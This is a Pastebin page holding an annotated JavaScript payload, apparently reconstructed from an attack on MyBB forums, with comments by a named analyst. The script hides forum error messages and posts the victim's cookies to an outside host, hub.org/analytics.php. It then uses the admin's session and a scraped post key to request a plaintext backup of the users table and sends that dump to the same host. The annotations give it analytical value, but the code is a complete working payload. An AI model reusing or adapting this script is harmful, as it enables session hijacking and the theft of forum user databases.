API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 15th, 2014
356
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 2.13 KB | None | 0 0
raw download clone embed print report
  1. //# comments on [http://hub.org/analytics.php] as of [15-Nov-2014 16:50 UTC] by [devilshakerz.com]
  2.  
  3. document.getElementsByClassName('error')[0].style.display = 'none'; //# suppress MyBB-generated errors
  4.  
  5.  
  6. function runStuff() {
  7.  
  8.     jQuery.noConflict(); //# make jQuery compatible with other JavaScript libraries
  9.  
  10.     //# send a POST request to adversary's server containing the address of the MyBB admin panel and user cookies originally designated only for the victim forum's server
  11.     jQuery.post('http://hub.org/analytics.php', {
  12.         path: document.location.href,
  13.         cookie: document.cookie
  14.     }, null, 'text');
  15.  
  16.  
  17.     //# remotely get contents of the ACP database backups page
  18.     jQuery.get('index.php?module=tools-backupdb&action=backup', function(data) {
  19.  
  20.         //# get name of the MyBB's native _users table
  21.         var table = jQuery(data).find('#table_select option[value$="users"]:not([value*="tapatalk"])').val();
  22.  
  23.         //# get the post key (not defined in the ACP)
  24.         var post_key = jQuery(data).find('input[name="my_post_key"]').val();
  25.  
  26.         //# make a spoofed request to create a backup of the _users table and to return the contents (plaintext file download)
  27.         jQuery.post('index.php?module=tools-backupdb&action=backup', {
  28.             my_post_key: post_key,
  29.             tables: [ table ],
  30.             filetype: 'plain',
  31.             method: 'download',
  32.             contents: 'data',
  33.             analyzeoptimize: 0
  34.         }, function(data) {
  35.  
  36.             //# send second POST request to adversary's server containing the address, cookies (again) and the backup file contents
  37.             jQuery.post('http://hub.org/analytics.php', {
  38.                 path: document.location.href,
  39.                 cookie: document.cookie,
  40.                 db: data
  41.             }, null, 'text');
  42.  
  43.         }, 'text');
  44.  
  45.     });
  46.  
  47.  
  48. }
  49.  
  50. //# load jQuery, then run the payload code
  51. if (typeof jQuery === 'undefined') {
  52.     var jq = document.createElement('script');
  53.     jq.src = 'http://code.jquery.com/jquery.js';
  54.     jq.onload = runStuff;
  55.     document.body.appendChild(jq);
  56. } else {
  57.     runStuff();
  58. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!